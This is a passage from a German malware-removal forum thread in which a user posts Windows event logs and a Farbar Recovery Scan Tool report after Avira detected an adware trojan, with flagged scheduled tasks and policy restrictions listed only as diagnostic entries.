Error: (10/04/2020 03:03:52 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.
]

Error: (10/04/2020 03:03:52 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.
.

Error: (10/04/2020 03:03:52 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volumenschattenkopie-Dienst-Informationen: Der COM-Server mit CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} und dem Namen "CEventSystem" kann nicht gestartet werden. [0x8007045b, Der Computer wird heruntergefahren.
]

Error: (10/03/2020 09:42:14 PM) (Source: SecurityCenter) (EventID: 17) (User: )
Description: Das Sicherheitscenter konnte den Aufrufer nicht überprüfen. Der Fehler %1 ist aufgetreten.

Error: (10/03/2020 09:28:22 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (10/02/2020 09:44:24 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (10/01/2020 01:23:23 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf (C:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)


Systemfehler:
=============
Error: (10/04/2020 03:29:16 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (10/04/2020 03:29:04 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (10/04/2020 03:28:48 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (10/04/2020 03:28:41 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (10/04/2020 03:28:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (10/04/2020 03:28:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "WSearch" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (10/04/2020 03:28:21 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "ShellHWDetection" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (10/04/2020 03:28:21 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-QQL9K51)
Description: Fehler "1084" in DCOM, als der Dienst "dps" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}


Windows Defender:
===================================
Date: 2020-10-04 12:47:16.1630000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {82A43932-0823-4B7B-BC81-BA93A8C3057A}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-10-04 12:22:04.8580000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {2888243F-F7DE-4C57-8248-614740ECF8AA}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-10-04 15:25:06.4000000Z
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2020-10-04 15:21:36.8210000Z
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2020-10-04 15:14:58.8050000Z
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2020-10-04 15:12:51.8300000Z
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

CodeIntegrity:
===================================

Date: 2020-10-04 11:29:30.5920000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-10-01 12:02:54.9940000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-09-09 09:09:44.4130000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\avirasecuritycenteragent.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Avira\Antivirus\libcurl.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: American Megatrends Inc. A.90 12/06/2017
Hauptplatine: Micro-Star International Co., Ltd. B350 PC MATE (MS-7A34)
Prozessor: AMD Ryzen 5 1600 Six-Core Processor 
Prozentuale Nutzung des RAM: 18%
Installierter physikalischer RAM: 16336.14 MB
Verfügbarer physikalischer RAM: 13377.14 MB
Summe virtueller Speicher: 18768.14 MB
Verfügbarer virtueller Speicher: 14545.92 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.91 GB) (Free:110.21 GB) NTFS

\\?\Volume{cf7b37e2-3cfb-4faf-8e5e-cb9cf918a024}\ (Wiederherstellung) (Fixed) (Total:0.49 GB) (Free:0.05 GB) NTFS
\\?\Volume{a61bd163-d7d8-42ba-b8e6-092c13901f01}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         

Alt 04.10.2020, 15:52   #8
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Und hier FRST Teil 1:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 04-10-2020
durchgeführt von Tamy (Administrator) auf DESKTOP-QQL9K51 (Micro-Star International Co., Ltd. MS-7A34) (04-10-2020 15:31:28)
Gestartet von C:\Users\Tamy\Desktop
Geladene Profile: Tamy
Platform: Windows 10 Pro Version 2004 19041.508 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Geek Software GmbH -> Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe <2>
(Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\RemoteFXvGPUDisablement.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <2>
(netucate systems GmbH) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\YuLinc_AppShare_PingBack.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(Valve -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [18630280 2018-05-07] (Logitech Inc -> Logitech Inc.)
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => "C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe"
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-09-07] (Geek Software GmbH -> Geek Software GmbH)
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3395360 2020-09-04] (Valve -> Valve Corporation)
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Run: [] => [X]
HKLM\...\Windows x64\Print Processors\Canon MG3100 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDAR.DLL [30208 2012-03-14] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3100 series: C:\WINDOWS\system32\CNMLMAR.DLL [385024 2012-03-14] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\doPDF 7 Monitor: C:\WINDOWS\system32\dopdfmn7.dll [24968 2012-05-17] (Softland S.R.L. -> Softland)
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {1ACB1645-110F-4D42-9A1B-8946BB4EC2ED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe [525032 2020-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {1DBDDDCD-14AD-487E-8ACF-CE056D5F4854} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24611696 2020-09-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {2385DA70-A041-4701-8B52-C7961B7F3A98} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115056 2020-09-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {2A1C14F9-707F-4D01-AC6E-11BDCD9A1678} - System32\Tasks\BackgroundActivityCaptureService_6eb8e => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
Task: {2ADA8C4C-7DC6-44BF-B7DE-B2A7E252858C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24611696 2020-09-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {678A824B-D141-4938-A6F5-2B40BD531FBF} - System32\Tasks\Serial CredentialEnrollmentManagerUserSvc Avira => C:\Program Files (x86)\nodejs\node.exe [15017624 2017-05-02] (Node.js Foundation -> Node.js) <==== ACHTUNG
Task: {72E2EF0A-36D6-4ABD-8666-5124A0394EAF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe [525032 2020-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9176812B-D62C-4F67-9100-AAC13CB8A637} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
Task: {942415E4-5889-4AB8-9FC8-BF49FF8BEF49} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
Task: {94E7AD36-4B4F-4E8B-9FF7-5AB030EA8080} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe [525032 2020-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9DA09952-32D2-4A5F-8719-3E52A892C0F6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe [525032 2020-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {A62072D1-AFCA-4A2A-A128-DC218AA6B897} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1443720 2020-09-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {BE6CF635-D821-429D-B9FE-9547963C0A32} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115056 2020-09-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {CD18913A-4DA8-4CAD-950D-E23964078FAB} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4371352 2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Task: {E2FA6682-EFFC-4607-ABBF-069123B685CF} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [664784 2020-10-03] (Mozilla Corporation -> Mozilla Foundation)
Task: {E6606882-5426-42E7-93E6-5ECAFAA06C47} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4371352 2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{a94a074b-2686-4f31-bd3c-7f2aa32b5570}: [DhcpNameServer] 192.168.2.1

Edge: 
======
Edge Profile: C:\Users\Tamy\AppData\Local\Microsoft\Edge\User Data\Default [2020-10-04]
Edge Extension: ( ) - C:\Users\Tamy\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\medfdmgmgcfchonlphbfmmlpgnbnbdeh [2020-10-04]

FireFox:
========
FF DefaultProfile: u5btrav7.default
FF ProfilePath: C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default [2020-10-04]
FF user.js: detected! => C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\user.js [2020-10-04]
FF DownloadDir: C:\Users\Tamy\Downloads
FF Homepage: Mozilla\Firefox\Profiles\u5btrav7.default -> google.de
FF NewTab: Mozilla\Firefox\Profiles\u5btrav7.default -> hxxps://defaultsearch.co/homepage?hp=1&bitmask=9996&pId=AC191101&iDate=2020-06-08 09:40:46&bName=
FF Session Restore: Mozilla\Firefox\Profiles\u5btrav7.default -> ist aktiviert.
FF Extension: (NoScript) - C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2020-09-23]
FF Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2020-09-10]
FF SearchPlugin: C:\Users\Tamy\AppData\Roaming\Mozilla\Firefox\Profiles\u5btrav7.default\searchplugins\bing-lavasoft-ff59.xml [2020-08-26]
FF HKLM\...\Firefox\Extensions: [{21AAF3C3-8175-4C8D-87FD-39850D93AED5}] - C:\WINDOWS\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.xpi
FF Extension: ( ) - C:\WINDOWS\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.xpi [2020-10-04]
FF HKLM-x32\...\Firefox\Extensions: [{21AAF3C3-8175-4C8D-87FD-39850D93AED5}] - C:\WINDOWS\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.xpi
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11118976 2020-09-06] (Microsoft Corporation -> Microsoft Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [206472 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2509104 2020-06-10] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3460920 2020-06-10] (Electronic Arts, Inc. -> Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-09-07] (Geek Software GmbH -> Geek Software GmbH)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5097896 2020-09-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\NisSrv.exe [2343112 2020-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MsMpEng.exe [128360 2020-10-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 YuLinc_AppShare_PingBack.exe; C:\Program Files (x86)\netucate\YuLinc AppShare\YuLinc_AppShare_PingBack.exe [1464320 2017-10-13] (netucate systems GmbH) [Datei ist nicht signiert]
S4 edgeupdate; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc [X]
S4 edgeupdatem; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 ladfGSS; C:\WINDOWS\system32\drivers\ladfGSS.sys [45168 2018-05-07] (Logitech Inc -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [38136 2020-06-08] (Logitech Inc -> Logitech)
S3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [66808 2020-06-08] (Logitech Inc -> Logitech)
R3 MP4RecorderVAD; C:\WINDOWS\System32\drivers\mp4recordervad64.sys [38368 2017-10-13] (netucate systems GmbH -> netucate systems GmbH)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48520 2020-10-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [428256 2020-10-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [69856 2020-10-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-10-04 15:31 - 2020-10-04 15:31 - 000000000 ____D C:\Users\Tamy\Desktop\FRST-OlderVersion
2020-10-04 15:16 - 2020-10-04 15:16 - 000000000 ____D C:\WINDOWS\pss
2020-10-04 15:13 - 2020-10-04 15:25 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-10-04 11:37 - 2020-10-04 11:37 - 000004568 _____ C:\WINDOWS\system32\Tasks\BackgroundActivityCaptureService_6eb8e
2020-10-04 11:36 - 2020-10-04 15:33 - 000001152 __RSH C:\ProgramData\ntuser.pol
2020-10-03 21:59 - 2020-10-04 11:45 - 000037280 _____ C:\Users\Tamy\Desktop\Addition.txt
2020-10-03 21:55 - 2020-10-04 15:33 - 000015694 _____ C:\Users\Tamy\Desktop\FRST.txt
2020-10-03 21:55 - 2020-10-04 15:33 - 000000000 ____D C:\FRST
2020-10-03 21:53 - 2020-10-04 15:31 - 002299392 _____ (Farbar) C:\Users\Tamy\Desktop\FRST64.exe
2020-10-03 21:29 - 2020-10-03 21:29 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-10-03 10:58 - 2020-10-04 15:33 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-03 09:59 - 2020-10-03 09:59 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2020-10-03 09:57 - 2020-10-03 09:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-10-03 09:57 - 2020-10-03 09:57 - 000000000 ____D C:\Program Files\VideoLAN
2020-10-02 21:49 - 2020-10-02 21:49 - 000000000 ____D C:\Users\Tamy\AppData\Local\mbam
2020-10-02 21:48 - 2020-10-02 21:48 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-10-02 09:49 - 2020-10-02 10:24 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-09-26 15:27 - 2020-09-26 15:28 - 000000000 ____D C:\Users\Tamy\Downloads\Bilder_entwickeln
2020-09-24 10:47 - 2020-09-24 10:48 - 000000000 ____D C:\Users\Tamy\AppData\Local\Opera Software
2020-09-24 10:45 - 2020-09-24 10:48 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\Opera Software
2020-09-23 19:00 - 2020-09-23 19:00 - 000001035 _____ C:\Users\Public\Desktop\Pixum Fotowelt.lnk
2020-09-23 19:00 - 2020-09-23 19:00 - 000001035 _____ C:\ProgramData\Desktop\Pixum Fotowelt.lnk
2020-09-23 19:00 - 2020-09-23 19:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixum Fotowelt
2020-09-23 18:55 - 2020-09-23 18:55 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\hps-install
2020-09-23 15:51 - 2020-09-23 15:51 - 000001153 _____ C:\Users\Public\Desktop\PDF24.lnk
2020-09-23 15:51 - 2020-09-23 15:51 - 000001153 _____ C:\ProgramData\Desktop\PDF24.lnk
2020-09-23 15:51 - 2020-09-23 15:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2020-09-15 17:45 - 2020-09-15 17:45 - 004820992 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 004274688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 003992576 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
